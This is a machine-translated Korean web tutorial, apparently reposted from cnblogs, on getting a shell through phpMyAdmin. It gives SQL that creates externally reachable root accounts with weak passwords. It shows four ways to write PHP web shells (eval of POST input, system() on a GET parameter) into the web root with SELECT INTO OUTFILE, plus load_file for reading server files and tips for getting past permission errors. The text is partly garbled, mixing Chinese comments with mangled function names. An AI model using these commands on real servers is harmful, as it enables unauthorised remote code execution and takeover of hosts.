요약 PHPmyadmin은 쉘을 사용합니다.

藏色散人
풀어 주다: 2021-01-04 14:37:48
앞으로
1953명이 탐색했습니다.

다음은 phpmyadmin 사용 튜토리얼 컬럼phpmyadmin에 요약되어 있습니다. 쉘을 얻으세요. 도움이 필요한 친구들에게 도움이 되기를 바랍니다!

요약 PHPmyadmin은 쉘을 사용합니다.

PHPmyadmin이 쉘 요약을 가져옵니다

PHPmyadmin이 사용자 비밀번호를 변경합니다

localhost 또는 위의 1270.0.1을 직접 클릭하면 사용자 열이 표시됩니다. 수정을 클릭하세요. user 추측초 비밀번호는 ooxx이고 외부 연결이 가능합니다

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
로그인 후 복사

루트 계정을 만들고 비밀번호를 설정할 수 있습니다

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
로그인 후 복사

이렇게 하면 루트 외부 연결 계정이 생성되고 비밀번호는 123456이며 외부 링크에는 123456을 사용하세요

셸을 사용하는 네 가지 기본 방법:

방법 1:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
    一句话连接密码:7on
로그인 후 복사

방법 2:

读取文件内容:    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话:    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限:    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
로그인 후 복사

방법 3:

JhackJ 버전 PHPmyadmin get shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数: 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
로그인 후 복사

Me thod 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
로그인 후 복사

그런 다음 방문하세요. 웹사이트 디렉터리: http://www.2cto.com /study.php?cmd=dir

문장을 내보낼 때 Phpmyadmin이 나타납니다. (Errcode: 13 - Permission Deny)

이 디렉터리에 대한 권한이 없음을 의미합니다. .상위 디렉터리나 하위 디렉터리를 시도해 볼 수 있습니다

다시 작동하지 않으면 NTS를 사용하여 트래픽을 유도하세요

또한 디렉터리에 주의하세요

위 내용은 요약 PHPmyadmin은 쉘을 사용합니다.의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:cnblogs.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿
회사 소개 부인 성명 Sitemap
PHP 중국어 웹사이트:공공복지 온라인 PHP 교육,PHP 학습자의 빠른 성장을 도와주세요!